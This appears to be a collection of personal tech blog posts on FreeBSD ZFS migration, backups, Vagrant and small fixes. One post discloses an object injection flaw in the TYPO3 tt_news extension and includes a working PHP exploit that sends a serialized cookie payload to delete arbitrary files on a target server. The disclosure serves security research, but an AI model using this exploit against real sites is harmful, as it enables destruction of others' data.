
Migrate a FreeBSD Server With a ZFS Root Filesystem

ZFS is one of the best parts of FreeBSD and it is widely used for installations of all sizes. For a few years now it has been possible to have the complete root filesystem on ZFS. The snapshotting capabilities and the built-in zfs send and zfs recv commands make it easy to transfer a server to another system (given compatible hardware).

This short guide will show you how to migrate a running FreeBSD installation to another server. It expects that you are somewhat familiar with the shell, FreeBSD and ZFS. If you are having trouble: the man pages for zfs(8) and zpool(8) are excellent.

Preparing the target

First, boot the FreeBSD install CD image on the target machine. Choose “Shell” and start partitioning the disk:

# create a new partitioning scheme
gpart create -s gpt ada0
# add a boot partition
gpart add -b 34 -s 94 -t freebsd-boot ada0
# add the main data partition that will hold the ZFS pool
gpart add -t freebsd-zfs ada0

Repeat the above steps for each hard disk that should be part of the pool. Replace ada0 with your hard disk’s identifier. Now let’s create the pool.

zpool create tank mirror /dev/ada0p2 /dev/ada1p2

This command will create a mirrored pool named tank on two hard disks. Adapt it to your needs.

Sending a snapshot

Now that the pool is available, we can start to transfer it from the source machine. Log into the source machine, create a new snapshot and send it to the target machine:

setenv SNAPSHOT "move-`date +%y-%m-%d`"
# make a new snapshot
zfs snapshot -r tank@$SNAPSHOT
# send the snapshot to the new server
zfs send -vR tank@$SNAPSHOT | ssh <target> zfs recv -F tank

ZFS will now send all snapshots of all filesystems contained in tank to the new machine and print statistics while the process is running. You can run zpool iostat 10 on the target to verify that the data is being written.

Bonus: keeping up with changes

Sending the data to the new machine can take some time. If your machine is still actively being used while you send the snapshots, the changes will not make it to the new server. However: it’s easy to make another snapshot and just send a diff. The diff will, of course, be much smaller than the whole snapshot.

zfs snapshot -r tank@$SNAPSHOT-diff1
zfs send -vRi tank@$SNAPSHOT tank@$SNAPSHOT-diff1 | ssh <target> zfs recv -F tank

It may be necessary to repeat the step a few times, depending on the amount of changes and your connection.
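
Since the incremental step may have to be repeated, it helps to number the diff snapshots consistently. Below is a small sketch - the next_diff helper is made up for illustration, not part of ZFS. It reads the existing snapshot names on stdin and prints the next free -diffN name:

```shell
#!/bin/sh
# Sketch: derive the next "-diffN" snapshot name for a given base name.
# Reads the existing snapshot names (one per line) on stdin.
next_diff() {
    base="$1"
    # count how many diff snapshots already exist for this base
    n=$(grep -c "^${base}-diff")
    echo "${base}-diff$((n + 1))"
}

# example: two diffs exist already, so the next name ends in -diff3
printf '%s\n' "move-24-01-01" "move-24-01-01-diff1" "move-24-01-01-diff2" \
    | next_diff "move-24-01-01"
# prints "move-24-01-01-diff3"
```

A real run would feed it the output of zfs list -H -t snapshot -o name and use the result in the zfs send/recv pair shown above.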

Cleaning up

You will probably have to make some adaptations on the target before booting into FreeBSD. For me that’s mostly the network settings, as each of my servers has its own assigned IP. To do that, mount the freshly copied root filesystem on /mnt and make the changes:

# mount the root filesystem
mount -t zfs tank/root /mnt
# add the bootcode to the MBR
# repeat for all disks
gpart bootcode -b /mnt/boot/pmbr -p /mnt/boot/gptzfsboot -i 1 ada0
# do what you need to do, e.g:
# vi /mnt/etc/rc.conf

After that, clean everything up and reboot.

# unmount all filesystems
zfs umount -a
# also set the bootfs, it was not copied with zfs send
zpool set bootfs=tank/root tank
# export the pool
zpool export tank

An exact copy of the source server should now boot.

More on Backups

I already wrote something about how I do backups of my important data. However, some things changed and as the article gets quite a lot of traffic, I wanted to give an update on the details.

A major change is that I use BitTorrent Sync only for syncing, not for backups. In fact I don’t use btsync any more but I’ll get to that. While btsync works pretty well to keep data in multiple places up to date, it is simply not designed to do good backups. Of course not — I knew that from the beginning. I thought snapshotting the data in various places would automatically get me nice backups on top of all the syncing. While technically true, restoring data is kind of tedious and there is no easy way to search for older versions of a file. It works, but it’s not really fun at all.

So what is better? Instead of btsync I switched to a newish piece of software called Syncthing to sync regularly accessed/shared files. It is open source, written in Go and therefore relatively easy to deploy, and you can host the “announce” server yourself. You’re also required to whitelist any nodes that may access your data, which gives me a warm and fuzzy feeling. Although it is not yet 1.0, it already works really, really well. A downside is that there are currently no GUI clients, so you have to check http://localhost:8080 to see whether your data is in sync.

Arq: the cloud!

Well yeah, I kind of gave up — as my backups would ultimately end up in the cloud (via Amazon Glacier) anyway, I realized that it might be better to just back up to S3 and Glacier, with all the metadata, in the first place. Arq is an excellent and unobtrusive tool to do regular incremental backups from a Mac to Amazon Glacier. The encryption algorithm is open source, so if the software breaks one day and doesn’t get updates you can still access your data. Glacier is so cheap ($0.01 per GB per month) that you don’t really need to worry about storage cost. The downside is that Glacier needs roughly four hours to deliver a requested file. That’s why I still use Time Machine for hourly backups — it’s fast. Arq obviously eats a lot of bandwidth, so it’s less usable on a bad internet connection. Another possible problem is the relatively high CPU usage while a backup is running. It’s one of the few programs that make the fan of my laptop spin up.


For servers there exists an even simpler tool. Tarsnap is developed by Colin Percival, who was the Security Officer of the FreeBSD project. Don’t be intimidated by the old-school look of the website. It is made by a nerd for nerds. The website contains more technical information than all of the competitors’ websites combined. I like it.

As the name suggests, Tarsnap is just like tar, but instead of writing to files it writes backups to Amazon S3. Not only that, it does some really cool cryptographic tricks to allow deduplication and heavy compression of your already encrypted data. For example: I back up the whole /usr directory of my personal server with lots of jails. Tarsnap compresses and deduplicates the data so that only 14GB of the original 35GB must be transferred and stored. The storage is notably more expensive (250 picodollars per byte-month, or $0.25 per GB per month) as it is stored on S3 and not on Glacier. But that also means that there’s no delay when retrieving backups.

I use the cron script from Tim Bishop to make daily, weekly and monthly backups. It works so well that I’m tempted to replace Arq with Tarsnap on my workstations. I really like the simplicity and the unixesque feel. At the same time the GUI of Arq is a big plus — you want to see what’s going on on your workstation. Storing that much data on S3 might get expensive pretty soon.
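
The rotation idea behind such a cron script can be sketched like this. The period_for helper and the naming scheme are made up for illustration; this is not Tim Bishop’s actual script:

```shell
#!/bin/sh
# Sketch: pick a tarsnap archive label from the current date,
# mimicking a daily/weekly/monthly rotation.
period_for() {
    dom="$1"   # day of month, 01..31 (date +%d)
    dow="$2"   # day of week, 1..7 with 7 = Sunday (date +%u)
    if [ "$dom" = "01" ]; then
        echo monthly
    elif [ "$dow" = "7" ]; then
        echo weekly
    else
        echo daily
    fi
}

# a cron job could then create archives named e.g. host-daily-20140401:
#   tarsnap -cf "$(hostname)-$(period_for "$(date +%d)" "$(date +%u)")-$(date +%Y%m%d)" /usr
period_for 15 3   # prints "daily"
```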

However, how cool is it to do a fully incremental, deduplicated, safe, secure, compressed offsite backup with:

# tarsnap -cf mybackup /usr

It just works. You can’t beat that.

You Should Try FreeBSD!

You have probably heard of FreeBSD (or any other BSD). Have you used it? If yes: stop reading right here. If no: read on, maybe you want to try it.

I know plenty of developers who feel very comfortable with Linux (Ubuntu especially is common these days). They have their development server and probably their production server running on Linux. But why Linux and not FreeBSD? There are several reasons; maybe one applies to you.

FreeBSD? What’s that?

To some developers FreeBSD is what Linux is to their parents: maybe they heard about it once but don’t know what exactly it is. Well, FreeBSD is an open source operating system that has its origins in the Berkeley Software Distribution. Because Linux was heavily influenced by BSD, Linux and the BSDs are pretty similar on the surface. By surface I mean that lots of commands and directories are the same as on a Linux machine. A really big difference is that FreeBSD is developed as kernel and userland together. In the Linux world, however, there are plenty of vendors with their own distributions and patch sets applied on top of the Linux kernel. Matthew Fuller wrote an excellent and not too opinionated comparison of FreeBSD and Linux. I highly recommend the read.

My Ubuntu server already works — why bother?

Yes, there are millions of Linux servers out there and they work well. Why would anyone ever look at something different? Never touch a running system, right? Well, first I don’t want you to throw your production boxes out of the window and replace them with FreeBSD servers. Just spin up a VM and install FreeBSD, it’s not that hard. But more importantly it is good to realize that there are more free operating systems out there than you might think. Getting to know them will probably change your perspective. At least that is what happened to me.

Stack Overflow’s answers assume I have apt-get installed

That’s actually true: you come across an obscure error message from the calendar server you’re trying to install, google it and find instructions to fix it on Ubuntu/Debian only. If your understanding of the server OS only allows you to copy/paste random strings from Stack Overflow, you might not really enjoy FreeBSD (or anything besides Ubuntu) — but then, why are you operating a server in the first place?

The good thing is: FreeBSD comes with an excellent handbook. It does not only provide practical advice but also describes the architecture, history and quirks of FreeBSD (and to some extent Unix in general). Even better: once you get the basics it’s really easy to go on from there. One of the differences between Linux and the BSDs is that the BSDs are more structured, planned and clear. In contrast, Linux is more grown and chaotic, partly because of the decision to keep kernel and userland separate and partly because of the many distributions that all have their own idea of how to do things. That’s not bad in itself (really cool things have developed around it) but sometimes it makes things more complicated than they need to be.

I like to compare FreeBSD to a really tidy room where you can find everything with your eyes closed. Once you know where the closets are, it is easy to just grab what you need, even if you have never touched it before. To give you an example: everything you install that is not part of the so-called base system will be installed in /usr/local and only there. And while the base system’s configuration resides in /etc, everything you install will be configured in /usr/local/etc. Another good example is /etc/rc.conf. When you need to configure something regarding startup (network, services, swap) you can find it here, all in one place in a simple config file.

There is exactly one correct place for a given part of the system — it takes some time to get to know these places. But once you do, everything is exactly where you’d expect it.

Will program xyz work?

Almost certainly everything you use will also work on FreeBSD. Have a look at the ports tree. The ports system lets you install packages easily — it is FreeBSD’s package management. Installing a precompiled package is as easy as pkg install <pkgname>, and ports makes it really easy to compile a package yourself when the precompiled binary does not fit your needs.

That being said, there are some things that just won’t compile because of a Linux-specific include or something similar. In those cases it can be sufficient to comment out an include, but you might also need to invest weeks to patch something. However, that rarely happens. Nearly everything in the ports tree (which is a lot) runs just fine out of the box. There are even compatibility packages for running Linux binaries.

Is FreeBSD stable?

Yes, it’s rock solid. Many major companies like Google or Netflix use FreeBSD in production. FreeBSD people are conservative when it comes to changes to the system. They really don’t like surprises.

Developing and shipping the kernel and userland together eliminates one big source of errors.

A stable system is good. But are there any extras?

There are many details that are unique to FreeBSD but I’ll highlight two features that are really popular.

Obviously ZFS brings many people to FreeBSD. It is a file system and logical volume manager in one. Some of the really cool features are easy snapshotting (and easy handling of snapshots), storage pools, built-in compression, copy-on-write, data deduplication and many more. The best part is that it’s really stable, plus FreeBSD can boot from ZFS. If you like to have your data in a safe place, you’ll love ZFS.

The other really cool thing that got me into FreeBSD is jails. A jail is a bit like chroot on steroids — and more. Inside a jail nearly everything looks like a normal FreeBSD installation, but only the processes, files and user accounts inside the jail are visible, even though it runs on the same kernel as the host system. Have a wonky WordPress installation? Put it in a jail and be sure that it won’t take your mail server with it when it gets compromised. Because jails use the same kernel as the host, they’re really lightweight and you can run many of them on one machine. They are like Linux containers but 15 years more stable.

Where to go from here

The FreeBSD website is an excellent resource. If you’re into pragmatic video tutorials: the Vimeo user ‘hukl’ has uploaded a series of videos that shows the whole process from downloading FreeBSD to setting up jails with ZFS. The IRC channel #freebsd on Freenode is a really friendly and helpful place if you have any questions. The best thing to do is to download a FreeBSD image, fire up a VM and play around with it. Maybe you’ll like it as much as I do. I came for ZFS and stayed for FreeBSD.

Comments Hosted With Disgo

I’m happy to announce that as of now the comments on this blog are hosted by Disgo, a simple comment hosting application written in Go.

The old comments from Disqus were imported into Disgo. Unfortunately Disqus exports comments already rendered as HTML, while Disgo renders comments on the fly. So I had to strip all existing HTML - in other words: links were not imported.

The good part is: it loads in under 100ms and does not need an iframe or jQuery. Oh and you can host it yourself. Goodbye Disqus!

Object Injection Vulnerability in Tt_news

Disclaimer: I reported this vulnerability on September 12th, 2013 and got a response by September 16th. Nothing happened since. I asked for an update on February 4th and haven’t received a response, yet. Update February 12th: The TYPO3 security team released a security bulletin and a fixed version for the issue. Thanks!

Object Injection

What is object injection and why is it a problem? An object injection vulnerability allows an attacker to instantiate arbitrary objects - just think of a script that calls unserialize() on user-supplied input.

If the instantiated object evaluates something in its __wakeup() method or, say, unlinks a file in its destructor, the attacker will be able to do some damage. For more information see the OWASP wiki on ‘PHP Object Injection’.


“tt_news” is the most common extension for displaying news on a TYPO3-powered website. It can display a category menu, so the user can switch between several news categories. The menu state gets serialized and saved in a cookie. On the next request, the cookie is loaded and unserialized. And cookies are controlled by the user.

// lib/class.tx_ttnews_catmenu.php:337
$this->stored = unserialize($_COOKIE[$this->treeName]);

Affected is tt_news >= 3.0.0.


The fix: store the data in a session instead. Note that only sites that display the CATMENU plugin are affected.


  1. Load Swift_ByteStream_TemporaryFileByteStream
  2. Set path to delete
  3. ????
  4. Profit
<?php
if (!isset($argv[1]) || !isset($argv[2]))
    die('usage: ' . $argv[0] . " <news_url> <file_to_delete>\n");

// load the typo3 mailer. it will include swift
// the Swift_ByteStream_TemporaryFileByteStream will unlink $this->_path in the destructor
$payload = 'a:2:{i:500;O:26:"TYPO3\CMS\Core\Mail\Mailer":0:{}i:501;O:40:"Swift_ByteStream'.
'_TemporaryFileByteStream":1:{s:38:"' ."\0" . 'Swift_ByteStream_FileByteStream' . "\0".
'_path";s:' . strlen($argv[2]) . ':"'. $argv[2] .'";}}}';

$c = curl_init();
curl_setopt($c, CURLOPT_URL, $argv[1] . '?no_cache=1');
curl_setopt($c, CURLOPT_COOKIE, 'ttnewscat=' . urlencode($payload));
// actually fire the request so the cookie gets unserialized server-side
curl_exec($c);

After a bit of experimenting I was able to write arbitrary files to disk.

Responsible Disclosure

It was the first time I approached a major open source project with a (rather small) vulnerability. I chose responsible disclosure because I see no point in unnecessarily harming anyone. However, although this extension is not part of the core CMS and not that many instances may be affected by this particular bug, it’s still a widespread extension and you can download it from the official TYPO3 website (like any other extension). The project encourages you to disclose security bugs in extensions to the security team. I’m a bit disappointed about the whole experience. I recently found a major bug in the CMS core itself and a working exploit is almost ready, but I’m not sure anymore if I want to go down the responsible disclosure road again.

How I Backup

The day you lose important data due to a head crash of your hard disk, you start getting a little paranoid about backups. It’s not only important to have backups at all, they should also be the right ones. After some experimenting I’ve found a setup that works for my needs. So here’s how I backup my workstations and servers.


I use Macs and therefore OS X. The obvious choice here is OS X’s built-in mechanism: Time Machine. Although it has its quirks and the data format is proprietary, I do like it for two reasons:

  • it’s built-in and simple to use. Need an older version of a file? Just open Time Machine, scroll through the versions, restore it and you’re good.
  • since OS X 10.8 it can do seamless backups to multiple destinations

One destination is a FireWire drive that’s attached to the workstation, the second is a NAS running FreeBSD with netatalk. The notebook only backs up to the NAS (OS X makes local “backups” when I’m on the go and syncs them when I’m back home). That covers many of the “duh, I deleted a random file” cases. Handy and fast.

However, if both Macs went up in flames and I had to use a Linux system, I’d have trouble accessing the data, since the format is proprietary. So I need a way to access the really important data quickly. Bonus points if the data is accessible from anywhere in the world. Of course, simply rsyncing it once in a while works well — even incrementally — and I did that for some time. But it gets messy when more than two computers are involved. What if there was a piece of software that solves the syncing problem and the backup problem at once?

I wrote about BitTorrent Sync with EncFS already. In short, it uses the BitTorrent protocol to securely sync files between N computers. Your personal Dropbox. You can even generate “read-only tokens” that allow read-only access for a client. Important documents reside inside an EncFS container; the resulting (encrypted) files are shared via BitTorrent Sync and mounted automatically with a little help from the OS X Keychain on the workstation/laptop. The neat part is that I can just spin up a BitTorrent Sync client anywhere in the world and — given the correct 20-byte token — it will magically sync the data. Additional clients run on the NAS and on a root server. So there are three copies of a file seconds after it is created. Once my parents get faster internet connectivity I’ll hide a Raspberry Pi at their home, too, making it four copies. The root server takes hourly/daily/weekly/monthly snapshots of these files. See below.

As a software developer I create source code. I put everything with more than one file in a git repository that I push to the root server.

Where possible I exclude everything from the backup that can be downloaded from the internet, like software, music, movies, etc.


Since current servers are really powerful and oversized for most of my tasks, I have all tasks running as jails on a FreeBSD server. The server uses ZFS which has some really nice features. One of these features is easy snapshotting. The server takes snapshots of the filesystem, keeping:

  • hourly snapshots for the last 6 hours
  • daily snapshots for the last 6 days
  • weekly snapshots for the last 4 weeks
  • monthly snapshots for the last 4 months

And it doesn’t only do that for the root filesystem but individually for each jail, making rollbacks really easy. One of the jails runs btsync and stores a copy of the data from the Macs I mentioned earlier. The ZFS pool is mirrored on two hard disks, as is usual for servers.
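
A rotation script then has to destroy whatever falls out of these retention windows. The selection step can be sketched as follows - prune_list is a hypothetical helper, not the script the server actually runs. It reads snapshot names sorted oldest-first on stdin and prints the ones due for zfs destroy:

```shell
#!/bin/sh
# Sketch: print all but the newest $1 snapshots from a sorted list on stdin.
# A real rotation script would pipe the output into "xargs -n1 zfs destroy".
prune_list() {
    keep="$1"
    awk -v keep="$keep" '
        { lines[NR] = $0 }
        END { for (i = 1; i <= NR - keep; i++) print lines[i] }
    '
}

# example: keep the 2 newest of 4 hourly snapshots
printf '%s\n' "tank@hourly-1" "tank@hourly-2" "tank@hourly-3" "tank@hourly-4" \
    | prune_list 2
# prints tank@hourly-1 and tank@hourly-2
```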

ZFS provides a nice command, zfs send, that simply sends a snapshot to stdout. I use zfs send | gzip | openssl -e ... > /my/snapshot.gz.enc to create encrypted files of the monthly snapshots and the incremental daily diffs. Those files are shared via btsync (yes, I love that tool). Currently only the NAS at home syncs these snapshots. They are additionally sent to Amazon Glacier monthly as the last resort. I hope I’ll never have to use it.
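
The exact openssl flags are elided above; one plausible spelling of the pipeline (assuming openssl enc with AES-256-CBC and a passphrase - adapt cipher and key handling to taste) looks like this, with an echo standing in for the real zfs send:

```shell
#!/bin/sh
# Sketch of the encrypted snapshot pipeline. A real run would start with
# "zfs send tank@snapshot" instead of the echo.
echo "pretend this is a zfs send stream" \
    | gzip \
    | openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:hunter2 \
    > /tmp/snapshot.gz.enc

# restoring reverses the pipeline (and would end in "zfs recv")
openssl enc -d -aes-256-cbc -pbkdf2 -pass pass:hunter2 -in /tmp/snapshot.gz.enc \
    | gunzip
```

In practice you would read the passphrase from a key file (-pass file:...) instead of putting it on the command line.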

Vagrant With FreeBSD as Guest OS (Update)

When you’re working with Vagrant and your production servers are running FreeBSD, chances are that you also want to use FreeBSD as the Vagrant guest OS so the behaviour is consistent. The combination will not work out-of-the-box because FreeBSD doesn’t support the standard synced folder method Vagrant uses. So you need to switch to NFS sharing which needs a host-only (:private_network) network. Once you enable that, Vagrant cannot connect anymore to the virtual machine over SSH and it will look as if the machine halted.

See update below! There is a nice workaround using two virtual network interfaces. Here is a minimal Vagrantfile that works with FreeBSD 9.1:

Vagrant.configure("2") do |config|
  config.vm.box = "freebsd91"
  config.vm.box_url = ""

  # private network for NFS
  config.vm.network :private_network, ip: ""

  # configure the NICs
  config.vm.provider :virtualbox do |vb|
    vb.customize ["modifyvm", :id, "--nictype1", "virtio"]
    vb.customize ["modifyvm", :id, "--nictype2", "virtio"]
  end

  # use NFS for the synced folder
  config.vm.synced_folder ".", "/vagrant", :nfs => true
end

Update October 26, 2013

Petar Radošević published a FreeBSD 9.2 base box for VirtualBox with a nice, optimized Vagrantfile. The repository also includes a very handy guide on how to build your own VirtualBox image from the FreeBSD ISO.

Devise SSL Error on FreeBSD

When using Devise to authenticate users via OAuth with Facebook, I ran into an SSL certificate verification error:

SSL_connect returned=1 errno=0 state=SSLv3 read server certificate B: certificate verify failed

There’s lots of advice on how to fix the certificate verification error on Windows and Linux systems. However, providing a :ca_path doesn’t work on FreeBSD as the certificates are located in one file. You need to specify :ca_file in your config/initializers/devise.rb instead:

config.omniauth :facebook,
    client_options: {
      ssl: { ca_file: '/usr/local/share/certs/ca-root-nss.crt' }
    }

(De)activate IPv6 on OS X

IPv6 works pretty well and more content becomes available every day. Still, sometimes you want to deactivate it completely - in my case the SixXS tunnel was dropping too many packets, so I temporarily wanted IPv4 only. On OS X it’s easy to deactivate IPv6.

First, find your network device:

$ networksetup -listallnetworkservices
An asterisk (*) denotes that a network service is disabled.
Bluetooth DUN
iPhone USB
Bluetooth PAN

Then deactivate IPv6 on that device:

$ networksetup -setv6off <your_device>
# e.g.
$ networksetup -setv6off Wi-Fi

To reactivate, simply use:

$ networksetup -setv6automatic <your_device>
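
If you toggle IPv6 often, the two commands can be wrapped in a tiny helper. This is only a convenience sketch around the networksetup calls above; the ipv6 function name is made up:

```shell
#!/bin/sh
# Sketch: wrap the two networksetup invocations in one helper.
ipv6() {
    svc="$1"     # e.g. "Wi-Fi"
    action="$2"  # "on" or "off"
    case "$action" in
        off) networksetup -setv6off "$svc" ;;
        on)  networksetup -setv6automatic "$svc" ;;
        *)   echo "usage: ipv6 <service> on|off"; return 1 ;;
    esac
}

# e.g.: ipv6 Wi-Fi off
```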

UIScrollView Won’t Scroll on iOS 6

Today I was working on an iOS app for the first time in one or two years. When adding a UIScrollView I ran into a problem: it wouldn’t let me scroll, even though I had set the contentSize properly.

The solution is simple. Since Xcode 4.3, “Auto Layout” is switched on by default, which prevents the UIScrollView from scrolling. Rather than setting the contentSize in viewDidLoad, simply set it in viewDidAppear:

- (void)viewDidAppear:(BOOL)animated
{
    [super viewDidAppear:animated];
    self.scrollView.contentSize = CGSizeMake(320, 1000);
}